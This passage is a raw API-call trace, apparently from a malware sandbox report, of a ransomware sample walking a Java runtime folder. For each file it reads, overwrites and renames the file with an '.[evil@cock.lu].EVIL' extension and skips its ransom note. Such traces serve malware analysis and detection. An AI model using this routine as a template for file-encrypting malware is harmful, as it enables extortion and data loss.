_snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar") returned 50 [0097.702] wcscmp (_String1="jfxswt.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.702] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jfxswt.jar") returned 0x0 [0097.702] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar") returned 0x32 [0097.702] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfxswt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.704] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x848c, lpOverlapped=0x0) returned 1 [0097.707] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.707] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.707] _errno () returned 0x84b1160840 [0097.707] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.707] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x84a0, lpOverlapped=0x0) returned 1 [0097.707] CloseHandle (hObject=0x1a4) returned 1 [0097.707] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.707] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.707] __uncaught_exception () returned 0x84b1160800 [0097.707] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.707] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfxswt.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfxswt.jar.[evil@cock.lu].evil")) returned 1 [0097.708] ??_V@YAXPEAX@Z () returned 0x1 [0097.710] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfxswt.jar", dwFileAttributes=0x0) returned 0 [0097.711] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.711] wcsstr (_Str="jsse.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.711] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar") returned 48 [0097.711] wcscmp (_String1="jsse.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.711] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jsse.jar") returned 0x0 [0097.711] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar") returned 0x30 [0097.711] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jsse.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.713] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x8e789, lpOverlapped=0x0) returned 1 [0097.753] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.753] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.753] _errno () returned 0x84b1160840 [0097.754] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.754] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x8e7a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x8e7a0, lpOverlapped=0x0) returned 1 [0097.754] CloseHandle (hObject=0x1a4) returned 1 [0097.755] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.755] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.755] __uncaught_exception () returned 0x84b1160800 [0097.755] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.755] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jsse.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jsse.jar.[evil@cock.lu].evil")) returned 1 [0097.756] ??_V@YAXPEAX@Z () returned 0x1 [0097.758] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jsse.jar", dwFileAttributes=0x0) returned 0 [0097.758] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.758] wcsstr (_Str="jvm.hprof.txt", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.758] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt") returned 53 [0097.758] wcscmp (_String1="jvm.hprof.txt", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.758] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jvm.hprof.txt") returned 0x0 [0097.758] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt") returned 0x35 [0097.758] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.759] GetFileSize (in: hFile=0x1a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1082 [0097.759] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2f320a0, nNumberOfBytesToRead=0x10a0, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2f320a0*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1082, lpOverlapped=0x0) returned 1 [0097.760] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.760] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.760] _errno () returned 0x84b1160840 [0097.760] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.760] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2f320a0*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2f320a0*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x10a0, lpOverlapped=0x0) returned 1 [0097.760] CloseHandle (hObject=0x1a4) returned 1 [0097.760] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.760] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.761] __uncaught_exception () returned 0x84b1160800 [0097.761] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.761] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jvm.hprof.txt"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jvm.hprof.txt.[evil@cock.lu].evil")) returned 1 [0097.761] ??_V@YAXPEAX@Z () returned 0x1 [0097.761] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jvm.hprof.txt", dwFileAttributes=0x0) returned 0 [0097.761] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.761] wcsstr (_Str="logging.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.761] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties") returned 58 [0097.761] wcscmp (_String1="logging.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.761] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="logging.properties") returned 0x0 [0097.761] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties") returned 0x3a [0097.761] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\logging.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.763] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x997, lpOverlapped=0x0) returned 1 [0097.766] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.766] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.766] _errno () returned 0x84b1160840 [0097.766] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.766] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x9a0, lpOverlapped=0x0) returned 1 [0097.766] CloseHandle (hObject=0x1a4) returned 1 [0097.766] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.766] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.766] __uncaught_exception () returned 0x84b1160800 [0097.766] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.766] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\logging.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\logging.properties.[evil@cock.lu].evil")) returned 1 [0097.767] ??_V@YAXPEAX@Z () returned 0x1 [0097.770] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\logging.properties", dwFileAttributes=0x0) returned 0 [0097.770] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.770] wcsstr (_Str="management", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.770] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management") returned 50 [0097.770] wcscmp (_String1=".", _String2="management") returned -1 [0097.770] wcscmp (_String1="..", _String2="management") returned -1 [0097.770] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management") returned 0x32 [0097.770] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management") returned 0x0 [0097.770] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\*" [0097.770] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0097.771] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.771] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\.") returned 52 [0097.771] wcscmp (_String1=".", _String2=".") returned 0 [0097.771] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.771] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.771] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\..") returned 53 [0097.771] wcscmp (_String1=".", _String2="..") returned -1 [0097.771] wcscmp (_String1="..", _String2="..") returned 0 [0097.771] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.771] wcsstr (_Str="jmxremote.access", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.771] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access") returned 67 [0097.771] wcscmp (_String1="jmxremote.access", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.771] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jmxremote.access") returned 0x0 [0097.771] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access") returned 0x43 [0097.771] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\jmxremote.access"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.773] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf9e, lpOverlapped=0x0) returned 1 [0097.775] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.775] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.775] _errno () returned 0x84b1160840 [0097.775] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.775] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfa0, lpOverlapped=0x0) returned 1 [0097.775] CloseHandle (hObject=0x1a8) returned 1 [0097.776] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.776] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.776] __uncaught_exception () returned 0x84b1160800 [0097.776] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.776] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\jmxremote.access"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\jmxremote.access.[evil@cock.lu].evil")) returned 1 [0097.777] ??_V@YAXPEAX@Z () returned 0x1 [0097.780] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.access", dwFileAttributes=0x0) returned 0 [0097.781] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.781] wcsstr (_Str="jmxremote.password.template", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.781] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template") returned 78 [0097.781] wcscmp (_String1="jmxremote.password.template", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.781] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jmxremote.password.template") returned 0x0 [0097.781] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template") returned 0x4e [0097.781] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.784] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb28, lpOverlapped=0x0) returned 1 [0097.786] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.786] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.786] _errno () returned 0x84b1160840 [0097.786] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.786] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb40, lpOverlapped=0x0) returned 1 [0097.787] CloseHandle (hObject=0x1a8) returned 1 [0097.787] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.787] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.787] __uncaught_exception () returned 0x84b1160800 [0097.787] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.787] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template.[evil@cock.lu].evil")) returned 1 [0097.788] ??_V@YAXPEAX@Z () returned 0x1 [0097.790] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\jmxremote.password.template", dwFileAttributes=0x0) returned 0 [0097.791] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.791] wcsstr (_Str="management.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.791] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties") returned 72 [0097.791] wcscmp (_String1="management.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.791] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="management.properties") returned 0x0 [0097.791] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties") returned 0x48 [0097.791] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\management.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.792] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3926, lpOverlapped=0x0) returned 1 [0097.795] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.795] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.795] _errno () returned 0x84b1160840 [0097.795] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.795] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3940, lpOverlapped=0x0) returned 1 [0097.795] CloseHandle (hObject=0x1a8) returned 1 [0097.795] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.795] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.795] __uncaught_exception () returned 0x84b1160800 [0097.796] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.796] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\management.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\management.properties.[evil@cock.lu].evil")) returned 1 [0097.796] ??_V@YAXPEAX@Z () returned 0x1 [0097.799] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\management.properties", dwFileAttributes=0x0) returned 0 [0097.799] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.799] wcsstr (_Str="snmp.acl.template", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.799] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template") returned 68 [0097.799] wcscmp (_String1="snmp.acl.template", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.799] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="snmp.acl.template") returned 0x0 [0097.799] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template") returned 0x44 [0097.799] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.801] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd30, lpOverlapped=0x0) returned 1 [0097.803] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.803] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.803] _errno () returned 0x84b1160840 [0097.803] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.803] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd40, lpOverlapped=0x0) returned 1 [0097.804] CloseHandle (hObject=0x1a8) returned 1 [0097.804] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.804] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.804] __uncaught_exception () returned 0x84b1160800 [0097.804] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.804] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\snmp.acl.template"), lpNewFileName="C:\\\\Program 